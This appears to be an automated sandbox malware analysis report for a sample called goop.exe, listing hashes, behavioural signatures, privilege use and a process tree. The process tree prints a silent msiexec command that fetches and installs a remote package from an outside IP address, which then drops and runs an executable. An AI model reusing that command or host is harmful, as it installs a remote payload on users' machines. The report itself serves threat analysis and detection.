Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
29/05/2024, 05:05
Static task
static1
Behavioral task
behavioral1
Sample
goop.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
goop.exe
Resource
win10v2004-20240508-en
General
-
Target
goop.exe
-
Size
26KB
-
MD5
c731fe3c96d4c99b5e0bbfbf0beddcbd
-
SHA1
1755196df713731e92da7aef8039f958600966d1
-
SHA256
cf8047d4cc968984abac31c651812624f934d6a0a246e13aa6439efc15a76437
-
SHA512
72d2cb9d130266b4baa95ac907b578d51fc6d9b8c085fdded861d34933c9a4361e73ca4820e849d34099ad67468899e2e3a37a09bc93b07dab194f0c213d4c7e
-
SSDEEP
768:sEHP8yBrsBn3HQVOaqM41v1XbV9egm3Hrdd:sEHP8yBrsyIrTXeX3X
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
pid Process 3968 c2exe.exe -
Loads dropped DLL 1 IoCs
pid Process 2104 MsiExec.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 1572 ICACLS.EXE -
Use of msiexec (install) with remote resource 1 IoCs
pid Process 4948 msiexec.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 11 2816 msiexec.exe -
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\V: msiexec.exe -
Drops file in Windows directory 7 IoCs
description ioc Process File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSI5082.tmp msiexec.exe File opened for modification C:\Windows\LOGS\DPX\setupact.log EXPAND.EXE File opened for modification C:\Windows\LOGS\DPX\setuperr.log EXPAND.EXE File opened for modification C:\Windows\Installer\MSI4DA3.tmp msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 3456 goop.exe 3456 goop.exe 2816 msiexec.exe 2816 msiexec.exe -
Suspicious use of AdjustPrivilegeToken 37 IoCs
description pid Process Token: SeDebugPrivilege 3456 goop.exe Token: SeShutdownPrivilege 4948 msiexec.exe Token: SeIncreaseQuotaPrivilege 4948 msiexec.exe Token: SeSecurityPrivilege 2816 msiexec.exe Token: SeCreateTokenPrivilege 4948 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 4948 msiexec.exe Token: SeLockMemoryPrivilege 4948 msiexec.exe Token: SeIncreaseQuotaPrivilege 4948 msiexec.exe Token: SeMachineAccountPrivilege 4948 msiexec.exe Token: SeTcbPrivilege 4948 msiexec.exe Token: SeSecurityPrivilege 4948 msiexec.exe Token: SeTakeOwnershipPrivilege 4948 msiexec.exe Token: SeLoadDriverPrivilege 4948 msiexec.exe Token: SeSystemProfilePrivilege 4948 msiexec.exe Token: SeSystemtimePrivilege 4948 msiexec.exe Token: SeProfSingleProcessPrivilege 4948 msiexec.exe Token: SeIncBasePriorityPrivilege 4948 msiexec.exe Token: SeCreatePagefilePrivilege 4948 msiexec.exe Token: SeCreatePermanentPrivilege 4948 msiexec.exe Token: SeBackupPrivilege 4948 msiexec.exe Token: SeRestorePrivilege 4948 msiexec.exe Token: SeShutdownPrivilege 4948 msiexec.exe Token: SeDebugPrivilege 4948 msiexec.exe Token: SeAuditPrivilege 4948 msiexec.exe Token: SeSystemEnvironmentPrivilege 4948 msiexec.exe Token: SeChangeNotifyPrivilege 4948 msiexec.exe Token: SeRemoteShutdownPrivilege 4948 msiexec.exe Token: SeUndockPrivilege 4948 msiexec.exe Token: SeSyncAgentPrivilege 4948 msiexec.exe Token: SeEnableDelegationPrivilege 4948 msiexec.exe Token: SeManageVolumePrivilege 4948 msiexec.exe Token: SeImpersonatePrivilege 4948 msiexec.exe Token: SeCreateGlobalPrivilege 4948 msiexec.exe Token: SeRestorePrivilege 2816 msiexec.exe Token: SeTakeOwnershipPrivilege 2816 msiexec.exe Token: SeRestorePrivilege 2816 msiexec.exe Token: SeTakeOwnershipPrivilege 2816 msiexec.exe -
Suspicious use of WriteProcessMemory 13 IoCs
description pid Process procid_target PID 3456 wrote to memory of 4948 3456 goop.exe 85 PID 3456 wrote to memory of 4948 3456 goop.exe 85 PID 2816 wrote to memory of 2104 2816 msiexec.exe 90 PID 2816 wrote to memory of 2104 2816 msiexec.exe 90 PID 2816 wrote to memory of 2104 2816 msiexec.exe 90 PID 2104 wrote to memory of 1572 2104 MsiExec.exe 93 PID 2104 wrote to memory of 1572 2104 MsiExec.exe 93 PID 2104 wrote to memory of 1572 2104 MsiExec.exe 93 PID 2104 wrote to memory of 3956 2104 MsiExec.exe 95 PID 2104 wrote to memory of 3956 2104 MsiExec.exe 95 PID 2104 wrote to memory of 3956 2104 MsiExec.exe 95 PID 2104 wrote to memory of 3968 2104 MsiExec.exe 97 PID 2104 wrote to memory of 3968 2104 MsiExec.exe 97
Processes
-
C:\Users\Admin\AppData\Local\Temp\goop.exe"C:\Users\Admin\AppData\Local\Temp\goop.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3456 -
C:\Windows\system32\msiexec.exe"C:\Windows\system32\msiexec.exe" /quiet /i http://3.141.55.131:8000/c2exe.msi2⤵
- Use of msiexec (install) with remote resource
- Suspicious use of AdjustPrivilegeToken
PID:4948
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2816 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 8B7B4AFA4A92417B92ECB1421A98256B2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2104 -
C:\Windows\SysWOW64\ICACLS.EXE"C:\Windows\system32\ICACLS.EXE" "C:\Users\Admin\AppData\Local\Temp\MW-47fbb461-2cad-4354-890a-04ae3bfd5ebc\." /SETINTEGRITYLEVEL (CI)(OI)HIGH3⤵
- Modifies file permissions
PID:1572
-
-
C:\Windows\SysWOW64\EXPAND.EXE"C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files3⤵
- Drops file in Windows directory
PID:3956
-
-
C:\Users\Admin\AppData\Local\Temp\MW-47fbb461-2cad-4354-890a-04ae3bfd5ebc\files\c2exe.exe"C:\Users\Admin\AppData\Local\Temp\MW-47fbb461-2cad-4354-890a-04ae3bfd5ebc\files\c2exe.exe"3⤵
- Executes dropped EXE
PID:3968
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
6KB
MD5f48a85de44fbab2c246fae7ac3c2e079
SHA16ae186f30e2d1ffbda51daf5385dd5323daaf8b0
SHA256433894591dde3ef00e6b59f13c5106574d2920c5bde0c82567331305b2607127
SHA5124adf930db3f3eeb81132a0223c80bd7c066c279258aeeed88e300d38b3e8cdf1db9d643c9a60ae164a4b6e1892e6a389b0efcd3cccbb2c93b9bf0d061207dee3
-
Filesize
6KB
MD52f4531484ff7ac43f50304a421d52d8a
SHA1237404f24027658f4b7c4b59f4b6342b7694d141
SHA2561ef99f635530b86c85c4d3a3e2bd382e9ca61ac6b23ef1bfaf141933107aad89
SHA512967b93e18ef39d2138d8123e110bbb61114fbf7238eff53d9888c527dbdddd1e643224942dfd29d9a8448ffb857f5c4a2319118d05dcdbb656d1556968c930d1
-
Filesize
1KB
MD535730a1e5641cc7624e53845f46d6ede
SHA1c29d25d636be62c2a982e8b56225471032ad868b
SHA2564a941b25cfddf4d6e1fee304e92a3aee3e32a75a398b76db75440cdd7a9f395a
SHA51269ce6b41a7d964c0f63e4aa4bb473b17d1b14e5263dd1f0083cea324ffa90931e4aace3cd4eb0b0d6d0f04868d852130b290948c56cb25b3c7c01b131f20051f
-
Filesize
1KB
MD52a24253a52cc209cac8463fe426e0829
SHA120da59105674d0fbfbd1c38823e5270f7252d3e2
SHA2561cbaea13a301b25afe133622464351993354a5bc9885990e90c723cf3464ce03
SHA512038f12bd781a6d9722eca4b070c16ee161241dc06e17c7368248190d4c735d151b36f020c53307235dce08e4b3c0e06ae6727a9b2be4b0cfa4d8d5ffbee62665
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
252KB
MD5d457ede045732a5c1e1895304d1dc560
SHA1658c7ccbb5164044da088f5c3e447de059571e20
SHA2562cf84ed623f2680e8162d7499b9bdab785dad88bfb6fc012717f53c8dfae3dde
SHA5126da954934dcbabda052ffe6324880145e8e5334a077d1be0e865f6679e0abd6e207712d37f1f6ce6b79073d18dacaa60d56cc5bf534fe8f66138a29e8fba2f4c
-
Filesize
208KB
MD50c8921bbcc37c6efd34faf44cf3b0cb5
SHA1dcfa71246157edcd09eecaf9d4c5e360b24b3e49
SHA256fd622cf73ea951a6de631063aba856487d77745dd1500adca61902b8dde56fe1
SHA512ed55443e20d40cca90596f0a0542fa5ab83fe0270399adfaafd172987fb813dfd44ec0da0a58c096af3641003f830341fe259ad5bce9823f238ae63b7e11e108